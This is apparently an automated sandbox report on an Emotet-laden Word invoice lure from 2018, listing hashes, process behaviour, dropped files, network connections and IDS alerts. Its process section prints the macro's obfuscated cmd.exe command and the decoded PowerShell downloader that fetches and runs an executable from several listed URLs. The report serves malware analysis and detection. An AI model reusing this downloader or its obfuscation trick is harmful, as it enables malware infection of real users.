analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

0-Past-Due-Invoices

Full analysis: https://app.any.run/tasks/10324995-aa55-4b4c-81a6-5143bd005f17
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 18, 2018, 15:54:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 13:51:00 2018, Last Saved Time/Date: Tue Dec 18 13:51:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 34, Security: 0
MD5:

1D9EF5B880CE27C25025731D4F683D6D

SHA1:

D8EE33FA7AFCBD39C87E6CA33CF2F8F434F6F477

SHA256:

3E1D9B5029891C73801505E7C825807175D709D4DF15C7FE77A16357DE189FC2

SSDEEP:

3072:20nbUhcOODsQVa8GhDS0o9zTGOZD6EbzCdvInu:VUoUOZDlbevIn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 369.exe (PID: 2720)
      • 369.exe (PID: 3540)
      • archivesymbol.exe (PID: 2220)
      • archivesymbol.exe (PID: 2976)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2968)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2968)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2724)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2528)
    • EMOTET was detected

      • archivesymbol.exe (PID: 2976)
    • Connects to CnC server

      • archivesymbol.exe (PID: 2976)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 2976)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2528)
      • 369.exe (PID: 2720)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2132)
    • Starts itself from another location

      • 369.exe (PID: 2720)
    • Creates files in the user directory

      • powershell.exe (PID: 2528)
    • Application launched itself

      • 369.exe (PID: 3540)
    • Connects to unusual port

      • archivesymbol.exe (PID: 2976)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2968)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:18 13:51:00
ModifyDate: 2018:12:18 13:51:00
Pages: 1
Words: 5
Characters: 34
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 38
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 369.exe no specs 369.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2968"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0-Past-Due-Invoices.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2132c:\XMPhrwl\vwVpzOjCNHNnBB\cqYSUCvlc\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set pJ9=;'iLw'=BMt$}}{hctac}};kaerb;'Ldz'=oZV$;TRb$ metI-ekovnI{ )00008 eg- htgnel.)TRb$ metI-teG(( fI;'WQN'=Htc$;)TRb$ ,cFN$(eliFdaolnwoD.pqr${yrt{)EkO$ ni cFN$(hcaerof;'exe.'+HoR$+'\'+pmet:vne$=TRb$;'dDu'=tnm$;'963' = HoR$;'kwk'=PLt$;)'@'(tilpS.'GKHabg_iybyVx3h/li.gro.seulb.www//:ptth@b1Kf6_alLvtg/ed.nesniw-bulcsinnet.www//:ptth@2fp0_62Fgq5/ue.senuajsoedivsel.txen.www//:ptth@Rwaf_KBWz/moc.ahnagebas.www//:ptth@hheaIBwh_kVd/ten.oedivotohpthgilorp.www//:ptth'=EkO$;tneilCbeW.teN tcejbo-wen=pqr$;'TCc'=zDk$ llehsrewop&&for /L %Z in (510,-1,0)do set 1z=!1z!!pJ9:~%Z,1!&&if %Z lss 1 call %1z:*1z!=%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2724CmD /V:O/C"set pJ9=;'iLw'=BMt$}}{hctac}};kaerb;'Ldz'=oZV$;TRb$ metI-ekovnI{ )00008 eg- htgnel.)TRb$ metI-teG(( fI;'WQN'=Htc$;)TRb$ ,cFN$(eliFdaolnwoD.pqr${yrt{)EkO$ ni cFN$(hcaerof;'exe.'+HoR$+'\'+pmet:vne$=TRb$;'dDu'=tnm$;'963' = HoR$;'kwk'=PLt$;)'@'(tilpS.'GKHabg_iybyVx3h/li.gro.seulb.www//:ptth@b1Kf6_alLvtg/ed.nesniw-bulcsinnet.www//:ptth@2fp0_62Fgq5/ue.senuajsoedivsel.txen.www//:ptth@Rwaf_KBWz/moc.ahnagebas.www//:ptth@hheaIBwh_kVd/ten.oedivotohpthgilorp.www//:ptth'=EkO$;tneilCbeW.teN tcejbo-wen=pqr$;'TCc'=zDk$ llehsrewop&&for /L %Z in (510,-1,0)do set 1z=!1z!!pJ9:~%Z,1!&&if %Z lss 1 call %1z:*1z!=%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2528powershell $kDz='cCT';$rqp=new-object Net.WebClient;$OkE='http://www.prolightphotovideo.net/dVk_hwBIaehh@http://www.sabeganha.com/zWBK_fawR@http://www.next.lesvideosjaunes.eu/5qgF26_0pf2@http://www.tennisclub-winsen.de/gtvLla_6fK1b@http://www.blues.org.il/h3xVybyi_gbaHKG'.Split('@');$tLP='kwk';$RoH = '369';$mnt='uDd';$bRT=$env:temp+'\'+$RoH+'.exe';foreach($NFc in $OkE){try{$rqp.DownloadFile($NFc, $bRT);$ctH='NQW';If ((Get-Item $bRT).length -ge 80000) {Invoke-Item $bRT;$VZo='zdL';break;}}catch{}}$tMB='wLi';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3540"C:\Users\admin\AppData\Local\Temp\369.exe" C:\Users\admin\AppData\Local\Temp\369.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2720"C:\Users\admin\AppData\Local\Temp\369.exe"C:\Users\admin\AppData\Local\Temp\369.exe
369.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2220"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe369.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2976"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 863
Read events
1 376
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA83A.tmp.cvr
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58A0BA13.wmf
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE3B1099.wmf
MD5:
SHA256:
2528powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IFYMQKIUS30JP0PY2L56.temp
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F655FDA.wmfwmf
MD5:243984514B7D339530FD9FFF2902D22E
SHA256:09F9B8746F0563E626E9CC8B03AB333EB085A65A1057ACD6414960CDFAB2257B
2528powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2528powershell.exeC:\Users\admin\AppData\Local\Temp\369.exeexecutable
MD5:B1F0F25124CB0830D21AFC437EC30834
SHA256:84017BC5B9EBAC8116F083FDABE761FD1425E0405EEFA04E4FA58DBF4E02A7BB
2720369.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:B1F0F25124CB0830D21AFC437EC30834
SHA256:84017BC5B9EBAC8116F083FDABE761FD1425E0405EEFA04E4FA58DBF4E02A7BB
2968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C38CC0F39D4EC158555A27B64B5C261D
SHA256:E0E4E0CA60D3F2DF4383D1097360586F9BE36A5DF1836655DED4EC8463599F38
2528powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b5d6.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2528
powershell.exe
GET
301
93.90.146.108:80
http://www.prolightphotovideo.net/dVk_hwBIaehh
SE
html
255 b
suspicious
2528
powershell.exe
GET
200
93.90.146.108:80
http://www.prolightphotovideo.net/dVk_hwBIaehh/
SE
executable
124 Kb
suspicious
2976
archivesymbol.exe
GET
200
181.48.61.138:20
http://181.48.61.138:20/
CO
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2528
powershell.exe
93.90.146.108:80
www.prolightphotovideo.net
Levonline AB
SE
suspicious
2976
archivesymbol.exe
181.48.61.138:20
Telmex Colombia S.A.
CO
malicious
2976
archivesymbol.exe
217.173.64.242:443
OOO WestCall Ltd.
RU
suspicious

DNS requests

Domain
IP
Reputation
www.prolightphotovideo.net
  • 93.90.146.108
suspicious

Threats

PID
Process
Class
Message
2528
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2528
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2528
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2976
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2976
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info